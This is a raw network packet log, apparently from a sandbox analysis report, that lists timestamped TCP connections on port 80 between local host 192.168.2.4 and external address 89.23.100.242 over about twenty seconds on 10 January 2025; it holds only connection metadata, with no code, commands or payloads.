                                                                                                Jan 10, 2025 07:58:14.731751919 CET804987989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.731884956 CET4987980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.731895924 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.732002020 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.736841917 CET804988589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.840969086 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.845897913 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:14.849148989 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.849236965 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:14.854176998 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.079663038 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.084538937 CET804988589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.084748030 CET804988589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.204655886 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.209580898 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.209614992 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.209645987 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.476474047 CET804988589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.517082930 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.611236095 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.704827070 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.732343912 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.732484102 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.732894897 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.737410069 CET804988589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.737503052 CET4988580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.737677097 CET804988689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.737726927 CET4988680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.737873077 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:15.737937927 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.738004923 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:15.742839098 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.095899105 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.100912094 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.100949049 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.100975990 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.493371964 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.548325062 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.628550053 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.673331976 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.748084068 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.748415947 CET4990080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.753340006 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.753459930 CET804989389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:16.753559113 CET4989380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.754023075 CET4990080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.754162073 CET4990080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:16.758982897 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.111007929 CET4990080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:17.116219044 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.116256952 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.116285086 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.499454021 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.634829998 CET804990089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.637500048 CET4990080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:17.763510942 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:17.940099001 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:17.940201044 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:17.940373898 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:17.945594072 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.298494101 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.303495884 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.303531885 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.303563118 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.682701111 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.735821962 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.816788912 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.860883951 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.935395956 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.935574055 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.940474033 CET804990889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.940576077 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:18.940625906 CET4990880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.940659046 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.940762997 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:18.945615053 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.298449039 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:19.303522110 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.303560019 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.303589106 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.712601900 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:19.813973904 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:19.842578888 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.017107010 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.249010086 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.249309063 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.254208088 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.254278898 CET804991589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.254293919 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.254331112 CET4991580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.254432917 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.259385109 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.498903990 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.503845930 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.503932953 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.510812998 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.515765905 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.610934019 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.615029097 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.616097927 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.616137028 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.616164923 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.662180901 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.762479067 CET804992589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.762537003 CET4992580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.781469107 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.786485910 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.786596060 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.786803007 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.791594028 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.861207008 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:20.866198063 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:20.866417885 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.142388105 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.147622108 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.147659063 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.147691965 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.384130001 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.438735962 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.438796997 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.607119083 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.657833099 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.759690046 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.813985109 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.878506899 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.878626108 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.883357048 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.883527040 CET804992689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.883570910 CET4992680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.883951902 CET804993089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.884005070 CET4993080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.888237953 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:21.888308048 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.888396978 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:21.893184900 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.235941887 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:22.240956068 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.240991116 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.241019011 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.624304056 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.756917953 CET804993889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:22.757066011 CET4993880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.439750910 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.446047068 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.446430922 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.446549892 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.452595949 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.798440933 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:23.803719044 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.803756952 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:23.803785086 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.203321934 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.251471043 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.340606928 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.393752098 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.469178915 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.469420910 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.474328995 CET804994489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.474375963 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.474385023 CET4994480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.474452019 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.474577904 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.479665995 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.829755068 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:24.835247040 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.835267067 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:24.835278988 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.264178991 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.313986063 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.390616894 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.390763044 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.396301031 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.396378040 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.396456957 CET804995589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.396512032 CET4995580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.396646976 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.402106047 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.787328959 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:25.792172909 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.792188883 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:25.792196989 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.134363890 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.204737902 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.285588980 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.405172110 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.405412912 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.411087990 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.411148071 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.411263943 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.411309004 CET804996089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.411359072 CET4996080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.417212009 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.458033085 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.462884903 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.462949991 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.463062048 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.467875957 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.767345905 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.772207975 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.772218943 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.772227049 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.814057112 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:26.818938017 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:26.819041967 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.151107073 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.200588942 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.204634905 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.251501083 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.280587912 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.282202959 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.287285089 CET804996789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.287349939 CET4996780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.412123919 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.412839890 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.417182922 CET804996689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.417231083 CET4996680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.417628050 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.417687893 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.417792082 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.422590971 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.767205000 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:27.772161007 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.772171974 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:27.772181034 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.164181948 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.204762936 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.294439077 CET804997389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.345216990 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.425707102 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.432965994 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.433038950 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.433119059 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.437993050 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.782846928 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:28.787863970 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.787879944 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:28.787897110 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.187602043 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.235853910 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.339036942 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.392218113 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.466267109 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.466479063 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.471359968 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.471421957 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.471457005 CET804997989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.471498013 CET4997980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.471561909 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.477256060 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.829740047 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:29.834923983 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.834938049 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:29.834945917 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.209095001 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.314022064 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.336771011 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.448101997 CET4997380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.452274084 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.452543974 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.457428932 CET804999089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.457442999 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.457515955 CET4999080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.457520008 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.457621098 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.462378025 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.814064026 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:30.818975925 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.818984985 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:30.818991899 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.195014954 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.235877037 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:31.345979929 CET804999689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.392105103 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:31.472979069 CET5000280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:31.477929115 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.477999926 CET5000280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:31.478198051 CET5000280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:31.483083010 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.829890966 CET5000280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:31.834872007 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.834882975 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:31.834942102 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.208966017 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.302511930 CET5000280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.304784060 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.307760954 CET805000289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.307832956 CET5000280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.309693098 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.309827089 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.310082912 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.315107107 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.448961973 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.453891039 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.453965902 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.454057932 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.458947897 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.723364115 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.729511976 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.730524063 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.798728943 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:32.803659916 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.803674936 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:32.803725004 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.081465006 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.126665115 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.210731983 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.235840082 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.251483917 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.314009905 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.369803905 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.504899025 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.505768061 CET4999680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.508651018 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.508723021 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.508929014 CET5001780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.513703108 CET805000889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.513755083 CET5000880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.513923883 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.513933897 CET805000989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.513976097 CET5001780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.514003038 CET5000980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.514111042 CET5001780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.518902063 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.860999107 CET5001780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:33.866027117 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.866040945 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:33.866050005 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.276427984 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.329627037 CET5001780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:34.426084042 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.427423954 CET5001780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:34.432492971 CET805001789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.432548046 CET5001780192.168.2.489.23.100.242
